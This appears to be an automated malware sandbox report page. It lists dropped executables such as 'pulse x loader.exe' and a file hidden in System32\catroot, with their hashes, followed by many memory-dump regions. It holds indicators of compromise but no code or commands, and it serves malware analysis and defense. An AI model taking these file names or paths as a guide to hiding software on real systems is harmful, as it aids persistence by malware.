830e9b80f3d46d7a62d14c66bf871d090c4228b5974bb7d4bae97c5cc49fa63716e9a6f69eba4dd36ffb275e9d87337c77481365e1587872e60c9a97fb431ced

Download Submit
\Users\Admin\AppData\Local\Temp\pulse x loader.exe

Filesize
2.5MB

MD5
ec472524eaf5e61e5934c73d5df36b46

SHA1
25bb9d2126b9a58fa3732a08043f5307d87927df

SHA256
b7dfc6823243f225760d65afdedc25cbdc7e4ee383c93d712a5c5dd52e6f6acd

SHA512
2b266c8594c6827b82fae69b04827975629954f0fd984bb6b437222f009520a35c28624d639d85bb7e7215230cd485ee9cf1c52df8057fb8dbad38b1c39725c0

Download Submit
\Users\Admin\AppData\Local\Temp\switched.exe

Filesize
3.7MB

MD5
b9bbe31d276de5c3d05352d070ae4244

SHA1
5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

SHA256
a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

SHA512
0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

Download Submit
\Windows\System32\catroot\$SXR\$SXR.exe

Filesize
1.7MB

MD5
d377b6bbca14055e4819a53f5f8e4be3

SHA1
34fa3bc796af0e8f440649429f5586579f9f2c53

SHA256
2371269092c8700be584345f8c5b2bedba36ed303f72d6e66db10c1df2a2d185

SHA512
c9ed252ed0b0d4485c7b8236d210f7dcbeb8f17aeba60538944973e2870b3612016034bc2d14beb0e5d0ba43ed27f2f71b1f997c6d77a27efa492104a5225120

Download Submit
memory/556-128-0x0000000004090000-0x0000000004091000-memory.dmp

Filesize
4KB

Download
memory/556-99-0x0000000004090000-0x0000000004091000-memory.dmp

Filesize
4KB

Download
memory/556-135-0x0000000002B20000-0x0000000002B30000-memory.dmp

Filesize
64KB

Download
memory/928-105-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/928-103-0x0000000000970000-0x0000000000FB0000-memory.dmp

Filesize
6.2MB

Download
memory/928-104-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/928-129-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/928-130-0x00000000025D0000-0x0000000002610000-memory.dmp

Filesize
256KB

Download
memory/1204-72-0x000000006EF50000-0x000000006F4FB000-memory.dmp

Filesize
5.7MB

Download
memory/1204-84-0x000000006EF50000-0x000000006F4FB000-memory.dmp

Filesize
5.7MB

Download
memory/1204-68-0x000000006EF50000-0x000000006F4FB000-memory.dmp

Filesize
5.7MB

Download
memory/1204-79-0x00000000028F0000-0x0000000002930000-memory.dmp

Filesize
256KB

Download
memory/1204-75-0x00000000028F0000-0x0000000002930000-memory.dmp

Filesize
256KB

Download
memory/1204-71-0x00000000028F0000-0x0000000002930000-memory.dmp

Filesize
256KB

Download
memory/1560-73-0x0000000002000000-0x0000000002040000-memory.dmp

Filesize
256KB

Download
memory/1560-74-0x000000006EF50000-0x000000006F4FB000-memory.dmp

Filesize
5.7MB

Download
memory/1560-70-0x000000006EF50000-0x000000006F4FB000-memory.dmp

Filesize
5.7MB

Download
memory/1560-76-0x0000000002000000-0x0000000002040000-memory.dmp

Filesize
256KB

Download
memory/1560-77-0x0000000002000000-0x0000000002040000-memory.dmp

Filesize
256KB

Download
memory/1560-83-0x000000006EF50000-0x000000006F4FB000-memory.dmp

Filesize
5.7MB

Download
memory/1716-28-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/1716-98-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/1716-14-0x00000000000D0000-0x0000000000710000-memory.dmp

Filesize
6.2MB

Download
memory/1716-85-0x00000000024D0000-0x0000000002510000-memory.dmp

Filesize
256KB

Download
memory/2092-45-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2092-44-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2092-126-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/2092-125-0x0000000004920000-0x0000000004960000-memory.dmp

Filesize
256KB

Download
memory/2092-53-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2092-78-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/2092-55-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2092-57-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2092-50-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2092-47-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2092-46-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2092-67-0x0000000004920000-0x0000000004960000-memory.dmp

Filesize
256KB

Download
memory/2564-86-0x000000013F2A0000-0x000000013F6DC000-memory.dmp

Filesize
4.2MB

Download
memory/2564-29-0x000000013F2A0000-0x000000013F6DC000-memory.dmp

Filesize
4.2MB

Download
memory/2692-31-0x0000000004F90000-0x0000000004FD0000-memory.dmp

Filesize
256KB

Download
memory/2692-26-0x00000000011E0000-0x0000000001262000-memory.dmp

Filesize
520KB

Download
memory/2692-30-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/2692-69-0x0000000074350000-0x0000000074A3E000-memory.dmp

Filesize
6.9MB

Download
memory/2976-82-0x00000000003E0000-0x0000000000460000-memory.dmp

Filesize
512KB

Download
memory/2976-124-0x000007FEF5660000-0x000007FEF604C000-memory.dmp

Filesize
9.9MB

Download
memory/2976-58-0x0000000000E30000-0x0000000000E38000-memory.dmp

Filesize
32KB

Download
memory/2976-127-0x00000000003E0000-0x0000000000460000-memory.dmp

Filesize
512KB

Download
memory/2976-66-0x000007FEF5660000-0x000007FEF604C000-memory.dmp

Filesize
9.9MB

Download